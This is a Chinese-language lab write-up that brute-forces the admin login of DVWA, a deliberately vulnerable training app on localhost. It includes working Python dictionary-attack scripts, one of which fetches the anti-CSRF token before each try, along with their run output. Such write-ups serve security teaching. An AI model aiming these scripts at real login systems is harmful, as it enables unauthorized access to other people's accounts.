low
URL:http://localhost/DVWA/vulnerabilities/brute/?username=admin&password=password&Login=Login
直接构造GET请求来进行暴力破解,这里使用Python编写脚本,使用弱密码字典进行暴力破解:
import requests
import re
url1 = "http://localhost/DVWA/vulnerabilities/brute/?username=admin&password="
url2 = "&Login=Login"
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0", \
"Cookie": "security=low; JSESSIONID=502D644D0E431EF234144A4955105F21; PHPSESSID=i32i84kkipl66mci5onfam0h4e"}
passFile = open('password.txt')
item = passFile.readline()
while item:
url = url1 + item.strip() + url2
print("try:" + url)
response = requests.get(url, headers=headers)
if response.status_code == 200:
content = response.text
pos = re.search('password incorrect', content)#分析响应内容得出如果密码不正确会包含password incorrect,也可以使用len(content)判断响应内容的长度来判断是否成功
if pos == None:
print("Success!")
break
else:
print("request error code:" + str(response.status_code))
item = passFile.readline()
passFile.close()
运行结果如下:
PS I:\pyscript\web> python .\DVWA_BF.py
try:http://localhost/DVWA/vulnerabilities/brute/?username=admin&password=123456&Login=Login
try:http://localhost/DVWA/vulnerabilities/brute/?username=admin&password=123456789&Login=Login
try:http://localhost/DVWA/vulnerabilities/brute/?username=admin&password=111111&Login=Login
try:http://localhost/DVWA/vulnerabilities/brute/?username=admin&password=5201314&Login=Login
try:http://localhost/DVWA/vulnerabilities/brute/?username=admin&password=12345678&Login=Login
try:http://localhost/DVWA/vulnerabilities/brute/?username=admin&password=123123&Login=Login
try:http://localhost/DVWA/vulnerabilities/brute/?username=admin&password=password&Login=Login
Success!
medium
该等级下,如果登录失败,后端会停顿两秒来延长暴力破解需要的时间。依然可以使用low采用的脚本进行攻击,不过攻击时间会长一些。
high
该等级下添加了Anti-CSRF token,这样一来在写攻击脚本的时候就需要先请求一次页面获取token然后再拿着token来请求登录,代码如下:
import requests
import re
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0", \
"Cookie": "security=high; JSESSIONID=502D644D0E431EF234144A4955105F21; PHPSESSID=i32i84kkipl66mci5onfam0h4e"}
def AttackFun(password):
url1 = "http://localhost/DVWA/vulnerabilities/brute/index.php?username=admin&password=" + password
url2 = "&Login=Login&user_token="
res = requests.get("http://localhost/DVWA/vulnerabilities/brute/index.php", headers=headers)
content = res.text
pos = re.search(r"name='user_token'", content).span()[1]
token = content[pos+8:pos+40]
#上面为获取token,下面开始拿着token攻击
url = url1 + url2 + token
print(url)
res = requests.get(url, headers=headers)
if res.status_code == 200:
content = res.text
pos = re.search("password incorrect", content)
if pos == None:
print("Success")
else:
print("error code:" + str(res.status_code))
passFile = open("password.txt")
line = passFile.readline()
while line:
AttackFun(line.strip())
line = passFile.readline()
passFile.close()
PS I:\pyscript\web> python .\DVWA_BF2.py
http://localhost/DVWA/vulnerabilities/brute/index.php?username=admin&password=123456&Login=Login&user_token=ae66c04fb2438e4ef6c67efc1d38865f
http://localhost/DVWA/vulnerabilities/brute/index.php?username=admin&password=123456789&Login=Login&user_token=f2ef72fdca774949e53ee67f42b2c232
http://localhost/DVWA/vulnerabilities/brute/index.php?username=admin&password=111111&Login=Login&user_token=82b87786d461085a3ab6fa5cf37cb78a
http://localhost/DVWA/vulnerabilities/brute/index.php?username=admin&password=5201314&Login=Login&user_token=a3a793863ab299618ca9d38e996cca68
http://localhost/DVWA/vulnerabilities/brute/index.php?username=admin&password=12345678&Login=Login&user_token=fbec1f9ab611343209762fac3a801607
http://localhost/DVWA/vulnerabilities/brute/index.php?username=admin&password=123123&Login=Login&user_token=34729acaffdc0e26113a5ffa237610fe
http://localhost/DVWA/vulnerabilities/brute/index.php?username=admin&password=password&Login=Login&user_token=70d5d59ab290b9f4b4ac9f26ce3fd444
Success